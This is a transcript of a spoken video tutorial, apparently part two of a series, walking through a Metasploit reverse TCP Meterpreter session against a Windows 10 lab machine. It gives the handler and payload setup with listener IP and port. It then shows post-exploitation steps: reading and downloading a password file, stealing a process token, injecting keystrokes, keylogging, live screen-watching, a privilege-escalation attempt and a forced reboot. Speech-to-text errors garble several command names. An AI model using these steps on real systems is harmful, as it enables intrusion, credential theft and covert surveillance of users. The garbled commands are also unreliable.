Okay, so this is part two of this video that I'm making regarding how to use reverse TCP exploit commands. Now, we are already connected to a session here. If we go and type in, go back into our Metasploit framework console, we're gonna reinitiate a session with this machine, with the Windows 10 machine, and run a few commands that I find to be pretty cool commands in order to use. In the meantime, we can just delete some of this stuff here. And we just have a few things here that we're running. I created a folder here on like my documents folder and just created like a list of passwords that users may don't normally type in or store. And I'm going to show you how you're able to locate those files or just be able to monitor what they're doing or as they're using their machine and or whatnot. What we can do is let's go ahead and use our exploit. So we're going to use exploit /multi/handler. Press enter. And then we're going to go ahead and set the payload. So set payload to Windows /meter treater /reverse TCP. And we're going to use the lhost. To press enter. From there, we're going to put set lhost to the Kali machine. In my case, it's 192.168.1.205. Press enter. And we're going to put the set L port to 4444. Press enter. And we're going to type in exploit. Being that we do have some the previous session from the previous video running, should get. Okay, here we are. We do have the session reestablished. As we can see, the user itself could be going on by their own business, surfing the web, just basically using their system. And you, on the other hand, for instance, if you wanted to see what type of directories, you can use the command shell, and that'll give you a interactive shell within the user's or the target machine. As you can see, we're right now in the C drive underneath the user's desktop folder, and you can use basic Windows 10 commands in order to see what file is there. Then of course, if you type cd ... it'll take you back one directory, and if you type in, for instance, as I was saying, we know that there's a password folder. We don't know about that now, but if we wanted to, being that we're in this interactive shell, I can type cd, say, let's take a look at their documents folder. Documents, press enter, and we'll type in vir/w, and you can see that there is a text file there named mypasswords.txt. Now, if you type in cat, I don't believe cat would work here. We would need to exit the shell. So if we type in exit and we get back to the meter treater, we can type in, let's see, download or just categorize. We can cat, and we can put in C:/users /user, then /documents /mypasswords.txt. And as you can see, it printed out the information or whatever data was stored into that password file that we just happened to come across. Another thing that we can do is we can download that file. So we type in download and then type in c/user/documents/my_password.txt. Press enter. Let's see, well, I spelled download wrong. So let's go ahead and correct that. Here we go. And as you can see, it downloaded the password text file. So if we go to our home and go to our root folder, we should have a file there that says my password text. And as you can see, we go to our my passwords. Here, it's the same passwords on both machines. So we were able to take that password. Another cool thing that I think I closed the terminal. No, we didn't. So another thing that's pretty cool that you can do. I already explained the screenshots. Another thing that you can do is basically steal tokens from certain processes. For instance, if I wanted to see the current PID of the program or process that is currently running on the Windows 10 machine, you can see that the current PID is 5440. So if I wanted to, I can try to steal the token for that process and then be able to manipulate that token for, I guess, my information or whatever I wanted to do with that token or that token. So if I type in steal token _token and then put in the process ID of the process of the token that you want to attempt to steal. In our case, is 5440, and you can see that we successfully stolen the token with the username of my user, which is what I'm logged into the Windows 10 machine. Another thing, commands that you can run from here is you can get execute commands. For instance, if I wanted to start Notepad from here, I can type in execute, and then I can put /f for file, I believe, and we type in C:/Windows/System32/notepad.exe. Should see that the process 5536 was created, and on our target machine, you can see that Notepad was started. And what's really cool is that you can type in keysend. I believe, let's see, it's we have keyboard send, so we're going to type in keyboard send and type hello. Well, looks like that doesn't work. The keyboard. Okay, I see what I did. So we'll type in keyboard. All right, we have that _ send, and then type in hello. And as you can see in the notepad, we got a word named hello that is stated there. Now, if you wanted to go ahead and kill that process, you can either type word kill notepad.exe, and it looks like notepad is okay. So let's see if we can kill it by the pkill command, which is same thing. So it's notepad, and let's see if we put in .exe and see if that terminates our notepad, which it did. As you can see, it killed the process 5536. Now, you could always again type in help in your meter creator prompt, and you'll be able to get help for any specific commands, or if you're unsure of a command, such as if you type in key and then you tap key, that should show you what other commands that you can use. Of course, keyscan _start allows you to scan or keep track of keystrokes that are being entered in by the user. Another cool thing that we can do here is also we can type in, let's see, IlluMiNaughty desktops. See what that gives us. And you can see that there's a Windows Station 0, and the name is default, and there is one session. Another thing that we can get is type in get desktop, and you can see it's just Windows once per session and default name. So it's just a small, a lesser info from there. Another thing that you can do is watch the user in remote time. If you type in screen share, you can see that that is starting, and you can see that there's a HTML file that was created in your root folder. So if you go to places and go home and into your root folder, there's a HTML file there that you can launch in your browser and watch the user in real time. Let's see if we can use it. FSMCA. You can see that right now we are currently viewing the target IP and the start time. And if I was the user was, let's say, wanting to go on YouTube, which may be, I guess, you'll be able to see the user in real time and just monitor what that user is actually doing. Let's go ahead and just use our Windows 10 machine here. And as you can see on your end, using the reverse TCP exploit by Metasploit, you'll be able to monitor users, and whether in your own network or just connected to a machine that is having that exploit running as a program service. So let's just move around here for a bit so you can see how the monitoring of the player is. So while that's minimized and we are recording or seeing the desktop, let's open up our Windows directory on our Windows 7 machine, and we can go back to Firefox, and we should start seeing updates within the browser. So that's one cool option. There is the screen share option within the Metasploit. Another thing that we can try to do is we can put use the command get system to try to elevate your privileges. And now this can either be successful or not. And it looks like that sys operation failed, so the environment is connect, and the following was attempted and token. So looks like that failed, but that's one of the commands that you can use. let's see something else that would be interesting to watch. We can, of course, type netstat, and you can see that it has all the processes running. Let's see if we can see any indication of our process here. So let's wait. Okay, so let's take a look. Establish, wait. And as you can see, here is the process 5440 is the PID. And as you can see, hackmywin10.exe is running in the background. If I wanted to, I can actually, for our last command, it's just like reboot. And you should see there our Windows 10 machine has been rebooted and our connection closed. And that basically concludes using the reverse TCP. There's a lot more features and commands. I suggest typing the help command when you're into the MetaSploit exploit prompt and try out some of these commands that are pretty useful and pretty cool just to use and learn off of. So again, this is IlluMiNaughty. Click the like button if you like, and if you don't like it, still click the like button. And I'll make more videos of this type of nature. Again, this is all for educational purposes, and it's not to be used on any outside networks or in order to harm any systems, networks, or reviews.